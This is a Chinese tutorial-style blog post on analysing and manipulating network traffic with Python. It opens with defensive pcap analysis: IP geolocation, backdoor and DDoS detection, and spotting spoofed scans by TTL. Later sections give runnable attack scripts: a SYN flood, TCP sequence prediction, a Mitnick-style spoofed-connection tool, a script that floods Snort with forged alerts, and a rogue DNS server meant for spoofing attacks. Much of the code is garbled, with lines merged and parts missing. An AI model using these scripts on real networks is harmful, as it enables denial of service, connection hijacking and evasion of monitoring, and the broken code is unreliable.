使用 Python 分析网络流量(使用筷子就餐会不会传染乙肝病毒)

网友投稿 230 2022-09-02


使用 Python 分析网络流量(使用筷子就餐会不会传染乙肝病毒)

IP地址精准识别 (三方库)

github地址下载:​​import geoip2.database>>> reader = geoip2.database.Reader('/path/to/GeoLite2-City.mmdb')>>> response = reader.city('128.101.101.101')>>>>>> response.country.iso_code'US'>>> response.country.name'United States'>>> response.country.names['zh-CN']u'美国'>>>>>> response.subdivisions.most_specific.name'Minnesota'>>> response.subdivisions.most_specific.iso_code'MN'>>>>>> response.city.name'Minneapolis'>>>>>> response.postal.code'55455'>>>>>> response.location.latitude44.9733>>> response.location.longitude-93.2323>>>>>> response.traits.networkIPv4Network('128.101.101.0/24')>>>>>> reader.close()

改造代码如下所示;

#coding=utf-8import dpktimport socketimport geoip2.databasedef GetPcap(pcap): ret = [] for timestamp,packet in pcap: try: eth = dpkt.ethernet.Ethernet(packet) ip = eth.data src = socket.inet_ntoa(ip.src) dst = socket.inet_ntoa(ip.dst) # print("[+] 源地址: %-16s --> 目标地址: %-16s"%(src,dst)) ret.append(dst) except: pass return set(ret)if __name__ == '__main__': fp = open('data.pcap','rb') pcap = dpkt.pcap.Reader(fp) addr = GetPcap(pcap) reader = geoip2.database.Reader("d://GeoLite2-City.mmdb") for item in addr: try: response = reader.city(item) print("IP地址: %-16s --> " %item,end="") print("网段: %-16s --> " %response.traits.network,end="") print("经度: %-10s 纬度: %-10s --> " %(response.location.latitude, response.location.longitude),end="") print("地区: {}".format(response.country.names["zh-CN"]),end="\n") except Exception: pass

使用Python画谷歌地图

#coding=utf-8# pip install python-geoip-geolite2# github地址下载:离线数据库:dpktimport socketimport geoip2.databasefrom optparse import OptionParserdef GetPcap(pcap): ret = [] for timestamp,packet in pcap: try: eth = dpkt.ethernet.Ethernet(packet) ip = eth.data src = socket.inet_ntoa(ip.src) dst = socket.inet_ntoa(ip.dst) # print("[+] 源地址: %-16s --> 目标地址: %-16s"%(src,dst)) ret.append(dst) except: pass return set(ret)def retKML(addr,longitude,latitude): kml = ( '\n' '%s\n' '\n' '%6f,%6f\n' '\n' '\n' ) %(addr, longitude, latitude) return kmlif __name__ == '__main__': parser = OptionParser() parser.add_option("-p", "--pcap", dest="pcap_file", help="set -p *.pcap") parser.add_option("-d", "--mmdb", dest="mmdb_file", help="set -d *.mmdb") (options, args) = parser.parse_args() if options.pcap_file and options.mmdb_file: fp = open(options.pcap_file,'rb') pcap = dpkt.pcap.Reader(fp) addr = GetPcap(pcap) reader = geoip2.database.Reader(options.mmdb_file) kmlheader = '\ \n " %item,end="") print("网段: %-16s --> " %response.traits.network,end="") print("经度: %-10s 纬度: %-10s --> " %(response.location.latitude, response.location.longitude),end="") print("地区: {}".format(response.country.names["zh-CN"]),end="\n") with open("GoogleEarth.kml","a+") as f: f.write(retKML(item,response.location.latitude, response.location.longitude)) f.close() except Exception: pass kmlfooter = '\n\n' with open("GoogleEarth.kml", "a+") as f: f.write(kmlfooter) f.close() else: parser.print_help()

接着访问谷歌地球:直接将生成的googleearth.kml 导入即可完成定位。

用于 Windows(32 位)的 7.3.2 版 发现URL中存在的.zip 字样链接

#coding=utf-8import dpktimport socketdef FindPcapWord(pcap,WordKey): for ts,buf in pcap: try: eth = dpkt.ethernet.Ethernet(buf) ip = eth.data src = socket.inet_ntoa(ip.src) dst = socket.inet_ntoa(ip.dst) tcp = ip.data = dpkt. if(== "GET"): uri = if WordKey in uri: print("[+] 源地址: {} --> 目标地址: {} 检索到URL中存在 {}".format(src,dst,uri)) except Exception: passfp = open("D://aaa.pcap","rb")pcap = dpkt.pcap.Reader(fp)FindPcapWord(pcap,"wang.zip")

解析本机数据包中是否包含后门

#coding=utf-8import dpktimport socketdef FindPcapWord(pcap,WordKey): for timestamp,packet in pcap: try: eth = dpkt.ethernet.Ethernet(packet) ip = eth.data src = socket.inet_ntoa(ip.src) dst = socket.inet_ntoa(ip.dst) tcp = ip.data = dpkt. if(== "GET"): uri = if WordKey in uri: print("[+] 源地址: {} --> 目标地址: {} 检索到URL中存在 {}".format(src,dst,uri)) except Exception: passdef FindHivemind(pcap): for timestamp,packet in pcap: try: eth = dpkt.ethernet.Ethernet(packet) ip = eth.data tcp = ip.data src = socket.inet_ntoa(ip.src) dst = socket.inet_ntoa(ip.dst) sport = tcp.sport dport = tcp.dport # print("[+] 源地址: {}:{} --> 目标地址:{}:{}".format(src,sport,dst,dport)) if dport == 80 and dst == "125.39.247.226": # 如果数据流中存在cmd等明文命令则说明可能存在后门 if '[cmd]# ' in tcp.data.lower(): print("[+] {}:{}".format(dst,dport)) except Exception: passfp = open("D://aaa.pcap","rb")pcap = dpkt.pcap.Reader(fp)FindHivemind(pcap)

实时检测DDoS攻击:

主要通过设置检测不正常数据包数量的阈值来判断是否存在DDoS攻击。

#coding=utf-8import dpktimport socketdef FindPcapWord(pcap,WordKey): for timestamp,packet in pcap: try: eth = dpkt.ethernet.Ethernet(packet) ip = eth.data src = socket.inet_ntoa(ip.src) dst = socket.inet_ntoa(ip.dst) tcp = ip.data = dpkt. if(== "GET"): uri = if WordKey in uri: print("[+] 源地址: {} --> 目标地址: {} 检索到URL中存在 {}".format(src,dst,uri)) except Exception: passdef FindHivemind(pcap): for timestamp,packet in pcap: try: eth = dpkt.ethernet.Ethernet(packet) ip = eth.data tcp = ip.data src = socket.inet_ntoa(ip.src) dst = socket.inet_ntoa(ip.dst) sport = tcp.sport dport = tcp.dport # print("[+] 源地址: {}:{} --> 目标地址:{}:{}".format(src,sport,dst,dport)) if dport == 80 and dst == "125.39.247.226": # 如果数据流中存在cmd等明文命令则说明可能存在后门 if '[cmd]# ' in tcp.data.lower(): print("[+] {}:{}".format(dst,dport)) except Exception: passdef FindDDosAttack(pcap): pktCount = {} for timestamp,packet in pcap: try: eth = dpkt.ethernet.Ethernet(packet) ip = eth.data tcp = ip.data src = socket.inet_ntoa(ip.src) dst = socket.inet_ntoa(ip.dst) sport = tcp.sport # 累计判断各个src地址对目标地址80端口访问次数 if dport == 80: stream = src + ":" + dst if pktCount.has_key(stream): pktCount[stream] = pktCount[stream] + 1 else: pktCount[stream] = 1 except Exception: pass for stream in pktCount: pktSent = pktCount[stream] # 如果超过设置的检测阈值500,则判断为DDOS攻击行为 if pktSent > 500: src = stream.split(":")[0] dst = stream.split(":")[1] print("[+] 源地址: {} 攻击: {} 流量: {} pkts.".format(src,dst,str(pktSent)))if __name__ == "__main__": fp = open("D://data.pcap","rb") pcap = dpkt.pcap.Reader(fp) FindPcapWord(pcap,"wang.zip")

理解数据包TTL字段

TTL即 time-to-live,由8比特组成,可以用来确定在到达目的地之前数据包经过了几跳。当计算机发送一个IP数据包时会设置TTL字段为数据包在到达目的地之前所应经过的中继跳转的上限值,数据包每经过一个路由设备,TTL值就自减一,若减至0还未到目的地,路由器会丢弃该数据包以防止无限路由循环。

Nmap进行伪装扫描时,伪造数据包的TTL值是没有经过计算的,因而可以利用TTL值来分析所有来自Nmap扫描的数据包,对于每个被记录为Nmap扫描的源地址,发送一个ICMP数据包来确定源地址与目标机器之间隔了几跳,从而来辨别真正的扫描源。

Nmap的 -D参数实现伪造源地址扫描:nmap 192.168.220.128 -D 8.8.8.8

Wireshark抓包分析,发现确实是有用伪造源地址进行扫描:

可以看到默认扫描的Nmap扫描,其ttl值是随机的。

用Scapy解析TTL的值

这里使用Scapy库来获取源地址IP及其TTL值。

#coding=utf-8from scapy.all import *# 避免IPy与from IPy import IP as PYIP# 检查数据包的IP层,提取出IP和TTL字段的值def Get_TTL(pkt): try: if pkt.haslayer(IP): ip_src = pkt.getlayer(IP).src ip_sport = pkt.getlayer(IP).sport ip_dst = pkt.getlayer(IP).dst ip_dport = pkt.getlayer(IP).dport ip_ttl = str(pkt.ttl) print("[+] 源地址: %15s:%-5s --> 目标地址: %15s:%-5s --> TTL: %-5s"%(ip_src,ip_sport,ip_dst,ip_dport,ip_ttl)) except Exception: passif __name__=="__main__": sniff(prn=Get_TTL,store=0)

运行脚本监听,启动Nmap伪造源地址扫描即可看到如下结果:

接着添加checkTTL()函数,主要实现对比TTL值进行源地址真伪判断:

#!/usr/bin/python#coding=utf-8from scapy.all import *import timeimport optparse# 为避免IPy库中的IP类与Scapy库中的IP类冲突,重命名为IPTEST类from IPy import IP as IPTESTttlValues = {}THRESH = 5# 检查数据包的IP层,提取出源IP和TTL字段的值def testTTL(pkt): try: if pkt.haslayer(IP): ipsrc = pkt.getlayer(IP).src ttl = str(pkt.ttl) checkTTL(ipsrc, ttl) except: passdef checkTTL(ipsrc, ttl): # 判断是否是内网私有地址 if IPTEST(ipsrc).iptype() == 'PRIVATE': return # 判断是否出现过该源地址,若没有则构建一个发往源地址的ICMP包,并记录回应数据包中的TTL值 if not ttlValues.has_key(ipsrc): pkt = sr1(IP(dst=ipsrc) / ICMP(), retry=0, timeout=1, verbose=0) ttlValues[ipsrc] = pkt.ttl # 若两个TTL值之差大于阈值,则认为是伪造的源地址 if abs(int(ttl) - int(ttlValues[ipsrc])) > THRESH: print '\n[!] Detected Possible Spoofed Packet From: ' + ipsrc print '[!] TTL: ' + ttl + ', Actual TTL: ' + str(ttlValues[ipsrc])def main(): parser = optparse.OptionParser("[*]Usage python spoofDetect.py -i -t ") parser.add_option('-i', dest='iface', type='string', help='specify network interface') parser.add_option('-t', dest='thresh', type='int', help='specify threshold count ') (options, args) = parser.parse_args() if options.iface == None: conf.iface = 'eth0' else: conf.iface = options.iface if options.thresh != None: THRESH = options.thresh else: THRESH = 5 sniff(prn=testTTL, store=0)if __name__ == '__main__': main()

DNS请求包的收发

用nslookup命令来进行一次域名查询,Wireshark抓包如下:

可以看到客户端发送DNSQR请求包,服务器发送DNSRR响应包。

一个DNSQR包含有查询的名称qname、查询的类型qtype、查询的类别qclass。一个DNSRR包含有资源记录名名称rrname、类型type、资源记录类别rtype、TTL等等。

用Scapy找出fast-flux流量:

解析DNSRR的数据包,提取分别含有查询的域名和对应的IP的rrname和rdata变量

#coding=utf-8from scapy.all import *from IPy import IP as PYIP# 检查数据包的IP层,提取出IP和TTL字段的值def Get_TTL(pkt): try: if pkt.haslayer(IP): ip_src = pkt.getlayer(IP).src ip_sport = pkt.getlayer(IP).sport ip_dst = pkt.getlayer(IP).dst ip_dport = pkt.getlayer(IP).dport ip_ttl = str(pkt.ttl) print("[+] 源地址: %15s:%-5s --> 目标地址: %15s:%-5s --> TTL: %-5s"%(ip_src,ip_sport,ip_dst,ip_dport,ip_ttl)) except Exception: pass# 获取本机发送出去的DNS请求所对应的网站地址def Get_DNSRR(pkt): if pkt.haslayer(DNSRR): rrname = pkt.getlayer(DNSRR).rrname rdata = pkt.getlayer(DNSRR).rdata ttl = pkt.getlayer(DNSRR).ttl print("[+] 域名: {} --> 别名: {} --> TTL: {}".format(rrname,rdata,ttl))if __name__=="__main__": sniff(prn=Get_DNSRR,store=0)

用Scapy找出Domain Flux流量

这里只检查服务器53端口的数据包,DNS数据包有个rcode字段,当其值为3时表示域名不存在。

#coding=utf-8from scapy.all import *from IPy import IP as PYIP# 检查数据包的IP层,提取出IP和TTL字段的值def Get_TTL(pkt): try: if pkt.haslayer(IP): ip_src = pkt.getlayer(IP).src ip_sport = pkt.getlayer(IP).sport ip_dst = pkt.getlayer(IP).dst ip_dport = pkt.getlayer(IP).dport ip_ttl = str(pkt.ttl) print("[+] 源地址: %15s:%-5s --> 目标地址: %15s:%-5s --> TTL: %-5s"%(ip_src,ip_sport,ip_dst,ip_dport,ip_ttl)) except Exception: pass# 获取本机发送出去的DNS请求所对应的网站地址 IP --> URLdef Get_DNSRR(pkt): if pkt.haslayer(DNSRR): rrname = pkt.getlayer(DNSRR).rrname rdata = pkt.getlayer(DNSRR).rdata ttl = pkt.getlayer(DNSRR).ttl print("[+] 域名: {} --> 别名: {} --> TTL: {}".format(rrname,rdata,ttl))# 获取本机发送出去的网址请求解析为IP URL --> IPdef Get_DNSQR(pkt): # 判断是否含有DNSRR且存在UDP端口53 if pkt.haslayer(DNSRR) and pkt.getlayer(UDP).sport == 53: rcode = pkt.getlayer(DNS).rcode qname = pkt.getlayer(DNSQR).qname # 若rcode为3,则表示该域名不存在 if rcode == 3: print("[-] 域名解析不存在") else: print("[+] 解析存在:" + str(qname))if __name__=="__main__": sniff(prn=Get_DNSQR,store=0)

使用Scapy制造SYN洪泛攻击

使用Scapy制造一些再有TCP协议层的IP数据包,让这些包TCP源端口不断地自增一,而目的TCP端口513不变。

#coding=utf-8from scapy.all import *def synFlood(src, tgt): # TCP源端口不断自增一,而目标端口513不变 for sport in range(1024, 65535): IPlayer = IP(src=src, dst=tgt) TCPlayer = TCP(sport=sport, dport=513) pkt = IPlayer / TCPlayer send(pkt)src = "192.168.220.132"tgt = "192.168.220.128"synFlood(src, tgt)

计算TCP序列号:

主要通过发送TCP SYN数据包来从依次收到的SYN/ACK包中计算TCP序列号之差,查看是否存在可被猜测的规律。

#coding=utf-8from scapy.all import *def calTSN(tgt): seqNum = 0 preNum = 0 diffSeq = 0 # 重复4次操作 for x in range(1,5): # 若不是第一次发送SYN包,则设置前一个序列号值为上一次SYN/ACK包的序列号值 # 逻辑出现问题 # if preNum != 0: if seqNum != 0: preNum = seqNum # 构造并发送TCP SYN包 pkt = IP(dst=tgt) / TCP() ans = sr1(pkt, verbose=0) # 读取SYN/ACK包的TCP序列号 seqNum = ans.getlayer(TCP).seq if preNum != 0: diffSeq = seqNum - preNum print "[*] preNum: %d seqNum: %d" % (preNum, seqNum) print "[+] TCP Seq Difference: " + str(diffSeq) print return seqNum + diffSeqtgt = "192.168.220.128"seqNum = calTSN(tgt)print "[+] Next TCP Sequence Number to ACK is: " + str(seqNum + 1)

伪造TCP连接

添加伪造主要过程为先对远程服务器进行SYN洪泛攻击、使之拒绝服务,然后猜测TCP序列号并伪造TCP连接去跟目标主机建立TCP连接。

#!/usr/bin/python#coding=utf-8import optparsefrom scapy.all import *def synFlood(src, tgt): # TCP源端口不断自增一,而目标端口513不变 for sport in range(1024, 65535): IPlayer = IP(src=src, dst=tgt) TCPlayer = TCP(sport=sport, dport=513) pkt = IPlayer / TCPlayer send(pkt)def calTSN(tgt): seqNum = 0 preNum = 0 diffSeq = 0 # 重复4次操作 for x in range(1,5): # 若不是第一次发送SYN包,则设置前一个序列号值为上一次SYN/ACK包的序列号值 # 逻辑出现问题 # if preNum != 0: if seqNum != 0: preNum = seqNum # 构造并发送TCP SYN包 pkt = IP(dst=tgt) / TCP() ans = sr1(pkt, verbose=0) # 读取SYN/ACK包的TCP序列号 seqNum = ans.getlayer(TCP).seq if preNum != 0: diffSeq = seqNum - preNum print "[*] preNum: %d seqNum: %d" % (preNum, seqNum) print "[+] TCP Seq Difference: " + str(diffSeq) print return seqNum + diffSeq# 伪造TCP连接def spoofConn(src, tgt, ack): # 发送TCP SYN包 IPlayer = IP(src=src, dst=tgt) TCPlayer = TCP(sport=513, dport=514) synPkt = IPlayer / TCPlayer send(synPkt) # 发送TCP ACK包 IPlayer = IP(src=src, dst=tgt) TCPlayer = TCP(sport=513, dport=514, ack=ack) ackPkt = IPlayer / TCPlayer send(ackPkt)def main(): parser = optparse.OptionParser('[*]Usage: python mitnickAttack.py -s -S -t ') parser.add_option('-s', dest='synSpoof', type='string', help='specifc src for SYN Flood') parser.add_option('-S', dest='srcSpoof', type='string', help='specify src for spoofed connection') parser.add_option('-t', dest='tgt', type='string', help='specify target address') (options, args) = parser.parse_args() if options.synSpoof == None or options.srcSpoof == None or options.tgt == None: print parser.usage exit(0) else: synSpoof = options.synSpoof srcSpoof = options.srcSpoof tgt = options.tgt print '[+] Starting SYN Flood to suppress remote server.' synFlood(synSpoof, srcSpoof) print '[+] Calculating correct TCP Sequence Number.' seqNum = calTSN(tgt) + 1 print '[+] Spoofing Connection.' spoofConn(srcSpoof, tgt, seqNum) print '[+] Done.'if __name__ == '__main__': main()

使用Scapy愚弄IDS 入侵检测系统

这里IDS使用的是snort,本小节主要是通过分析snort的规则,制造假的攻击迹象来触发snort的警报,从而让目标系统产生大量警告而难以作出合理的判断,ids安装过程

yum -y install gcc flex bison zlib zlib-devel libpcap libpcap-devel pcre pcre-devel libdnet libdnet-devel tcpdump ngglibc-headers gcc-c++ openssl openssl-develwget -xzvf libdnet-1.11.tar.gz./configuremake && make installwget -xzvf daq-2.0.6.tar.gz./configuremake && make installwget src/make && make installwget --enable-sourcefiremake && make installsnort -q -A console -i eth2 -c /etc/snort/snort.conf

查看snort的ddos规则: vim /etc/snort/rules/ddos.rules     然后输入:/icmp_id:678 来直接查找

看到可以利用的触发警报的规则DDoS TFN探针:ICMP id为678,ICMP type为8,内容含有“1234”。其他的特征也按照规则下面的构造即可。只要构造这个ICMP包并发送到目标主机即可。

#!/usr/bin/python#coding=utf-8from scapy.all import *# 触发DDoS警报def ddosTest(src, dst, iface, count): pkt = IP(src=src, dst=dst) / ICMP(type=8, id=678) / Raw(load='1234') send(pkt, iface=iface, count=count) pkt = IP(src=src, dst=dst) / ICMP(type=0) / Raw(load='AAAAAAAAAA') send(pkt, iface=iface, count=count) pkt = IP(src=src, dst=dst) / UDP(dport=31335) / Raw(load='PONG') send(pkt, iface=iface, count=count) pkt = IP(src=src, dst=dst) / ICMP(type=0, id=456) send(pkt, iface=iface, count=count)src = "192.168.220.132"dst = "192.168.220.129"iface = "eth0"count = 1ddosTest(src, dst, iface, count)

再来查看snort的exploit.rules文件中的警报规则:  vim /etc/snort/rules/exploit.rules   然后输入:/EXPLOIT ntalkd x86 Linux overflow 来查找

可以看到,含有框出的指定字节序列就会触发警报。为了生成含有该指定字节序列的数据包,可以使用符号\x,后面跟上该字节的十六进制值。注意的是其中的“89|F|”在Python中写成“\x89F”即可。

# 触发exploits警报def exploitTest(src, dst, iface, count): pkt = IP(src=src, dst=dst) / UDP(dport=518) / Raw(load="\x01\x03\x00\x00\x00\x00\x00\x01\x00\x02\x02\xE8") send(pkt, iface=iface, count=count) pkt = IP(src=src, dst=dst) / UDP(dport=635) / Raw(load="^\xB0\x02\x89\x06\xFE\xC8\x89F\x04\xB0\x06\x89F") send(pkt, iface=iface, count=count)

接着伪造踩点或扫描的操作来触发警报。查看snort的exploit.rules文件中的警报规则:vim /etc/snort/rules/scan.rules     然后输入:/Amanda 来查找

可以看到,只要数据包中含有框出的特征码即可触发警报。

# 触发踩点扫描警报def scanTest(src, dst, iface, count): pkt = IP(src=src, dst=dst) / UDP(dport=7) / Raw(load='cybercop') send(pkt) pkt = IP(src=src, dst=dst) / UDP(dport=10080) / Raw(load='Amanda') send(pkt, iface=iface, count=count)

整合所有的代码,生成可以触发DDoS、exploits以及踩点扫描警报的数据包: -s参数指定发送的源地址,这里伪造源地址为1.2.3.4,-c参数指定发送的次数、只是测试就只发送一次即可。

#coding=utf-8import optparsefrom scapy.all import *from random import randint# 触发DDoS警报def ddosTest(src, dst, iface, count): pkt = IP(src=src, dst=dst) / ICMP(type=8, id=678) / Raw(load='1234') send(pkt, iface=iface, count=count) pkt = IP(src=src, dst=dst) / ICMP(type=0) / Raw(load='AAAAAAAAAA') send(pkt, iface=iface, count=count) pkt = IP(src=src, dst=dst) / UDP(dport=31335) / Raw(load='PONG') send(pkt, iface=iface, count=count) pkt = IP(src=src, dst=dst) / ICMP(type=0, id=456) send(pkt, iface=iface, count=count)# 触发exploits警报def exploitTest(src, dst, iface, count): pkt = IP(src=src, dst=dst) / UDP(dport=518) / Raw(load="\x01\x03\x00\x00\x00\x00\x00\x01\x00\x02\x02\xE8") send(pkt, iface=iface, count=count) pkt = IP(src=src, dst=dst) / UDP(dport=635) / Raw(load="^\xB0\x02\x89\x06\xFE\xC8\x89F\x04\xB0\x06\x89F") send(pkt, iface=iface, count=count)# 触发踩点扫描警报def scanTest(src, dst, iface, count): pkt = IP(src=src, dst=dst) / UDP(dport=7) / Raw(load='cybercop') send(pkt) pkt = IP(src=src, dst=dst) / UDP(dport=10080) / Raw(load='Amanda') send(pkt, iface=iface, count=count)def main(): parser = optparse.OptionParser('[*]Usage: python idsFoil.py -i -s -t -c ') parser.add_option('-i', dest='iface', type='string', help='specify network interface') parser.add_option('-s', dest='src', type='string', help='specify source address') parser.add_option('-t', dest='tgt', type='string', help='specify target address') parser.add_option('-c', dest='count', type='int', help='specify packet count') (options, args) = parser.parse_args() if options.iface == None: iface = 'eth0' else: iface = options.iface if options.src == None: src = '.'.join([str(randint(1,254)) for x in range(4)]) else: src = options.src if options.tgt == None: print parser.usage exit(0) else: dst = options.tgt if options.count == None: count = 1 else: count = options.count ddosTest(src, dst, iface, count) exploitTest(src, dst, iface, count) scanTest(src, dst, iface, count)if __name__ == '__main__': main()

Windows 网络嗅探

# -*- coding: UTF-8 -*-import osimport socketimport ctypesclass PromiscuousSocket (object): def __init__(self): HOST = socket.gethostbyname(socket.gethostname()) s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_IP) s.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1) s.bind((HOST, 0)) s.ioctl(socket.SIO_RCVALL, socket.RCVALL_ON) self.s = s def __enter__(self): return self.s def __exit__(self, *args, **kwargs): self.s.ioctl(socket.SIO_RCVALL, socket.RCVALL_OFF)def sniffer(count, bufferSize=65565): with PromiscuousSocket() as s: for i in range(count): package = s.recvfrom(bufferSize) print(package)if __name__ == '__main__': sniffer(count=10)

Linux 网络嗅探

import osimport socketimport ctypesimport fcntl # 结构体封装class ifreq(ctypes.Structure): _fields_ = [("ifr_ifrn", ctypes.c_char * 16), ("ifr_flags", ctypes.c_short)]# 需要用到的枚举值class FLAGS(object): # linux/if_ether.h ETH_P_ALL = 0x0003 # all protocols ETH_P_IP = 0x0800 # IP only # linux/if.h IFF_PROMISC = 0x100 # linux/sockios.h SIOCGIFFLAGS = 0x8913 # get the active flags SIOCSIFFLAGS = 0x8914 # set the active flagsclass PromiscuousSocketManager(object): def __init__(self): import fcntl # posix-only # htons: converts 16-bit positive integers from host to network byte order s = socket.socket(socket.PF_PACKET, socket.SOCK_RAW, socket.htons(FLAGS.ETH_P_ALL)) ifr = ifreq() ifr.ifr_ifrn = b'en0' #写死了,可以通过参数传递进来 fcntl.ioctl(s, FLAGS.SIOCGIFFLAGS, ifr) # get the flags ifr.ifr_flags |= FLAGS.IFF_PROMISC # add the promiscuous flag fcntl.ioctl(s, FLAGS.SIOCSIFFLAGS, ifr) # update self.ifr = ifr self.s = s def __enter__(self): return self.s def __exit__(self, *args, **kwargs): self.ifr.ifr_flags ^= FLAGS.IFF_PROMISC # mask it off (remove) fcntl.ioctl(self.s, FLAGS.SIOCSIFFLAGS, self.ifr) # updatedef sniffer(count, bufferSize=65565): with PromiscuousSocketManager() as s: for i in range(count): package = s.recvfrom(bufferSize) print(package)if __name__ == '__main__': sniffer(count=10)

Scapy 网络嗅探

# -*- coding: UTF-8 -*-from scapy.all import *scapy.config.conf.sniff_promisc=True #设置混杂模式def packetHandler(pkt): dport = pkt[IP][TCP].dport if dport==80 and pkt[IP][TCP].payload: print('捕获__name__ == '__main__': sniff(filter='tcp and port 80',prn=packetHandler,iface='en0')

收藏的一个DNS迷你服务器

实现简易DNS解析服务器: 具备基本的域名解析功能,通常配合DNS欺骗攻击工具一起使用效果更佳.```Pythonimport socketserver,structclass SinDNSQuery: def __init__(self, data): i = 1 self.name = '' while True: d = data[i] if d == 0: break; if d < 32: self.name = self.name + '.' else: self.name = self.name + chr(d) i = i + 1 self.querybytes = data[0:i + 1] (self.type, self.classify) = struct.unpack('>HH', data[i + 1:i + 5]) self.len = i + 5 def getbytes(self): return self.querybytes + struct.pack('>HH', self.type, self.classify)class SinDNSAnswer: def __init__(self, ip): self.name = 49164 self.type = 1 self.classify = 1 self.timetolive = 190 self.datalength = 4 self.ip = ip def getbytes(self): res = struct.pack('>HHHLH', self.name, self.type, self.classify, self.timetolive, self.datalength) s = self.ip.split('.') res = res + struct.pack('BBBB', int(s[0]), int(s[1]), int(s[2]), int(s[3])) return resclass SinDNSFrame: def __init__(self, data): (self.id, self.flags, self.quests, self.answers, self.author, self.addition) = struct.unpack('>HHHHHH', data[0:12]) self.query = SinDNSQuery(data[12:]) def getname(self): return self.query.name def setip(self, ip): self.answer = SinDNSAnswer(ip) self.answers = 1 self.flags = 33152 def getbytes(self): res = struct.pack('>HHHHHH', self.id, self.flags, self.quests, self.answers, self.author, self.addition) res = res + self.query.getbytes() if self.answers != 0: res = res + self.answer.getbytes() return resclass SinDNSUDPHandler(socketserver.BaseRequestHandler): def handle(self): data = self.request[0].strip() dns = SinDNSFrame(data) socket = self.request[1] namemap = SinDNSServer.namemap if(dns.query.type==1): name = dns.getname(); if namemap.__contains__(name): dns.setip(namemap[name]) socket.sendto(dns.getbytes(), self.client_address) elif namemap.__contains__('*'): dns.setip(namemap['*']) socket.sendto(dns.getbytes(), self.client_address) else: socket.sendto(data, self.client_address) else: socket.sendto(data, self.client_address)class SinDNSServer: def __init__(self, port=53): SinDNSServer.namemap = {} self.port = port def addname(self, name, ip): SinDNSServer.namemap[name] = ip def start(self): HOST, PORT = "0.0.0.0", self.port server = socketserver.UDPServer((HOST, PORT), SinDNSUDPHandler) server.serve_forever()if __name__ == "__main__": server = SinDNSServer() server.addname('lyshark.com', '192.168.1.1') server.addname('*', '192.168.1.2') server.start()```


版权声明:本文内容由网络用户投稿,版权归原作者所有,本站不拥有其著作权,亦不承担相应法律责任。如果您发现本站中有涉嫌抄袭或描述失实的内容,请联系我们jiasou666@gmail.com 处理,核实后本网站将在24小时内删除侵权内容。

上一篇:Java IO之File 类详解
下一篇:使用 Python 爬虫爬取网络
相关文章

 发表评论

暂时没有评论,来抢沙发吧~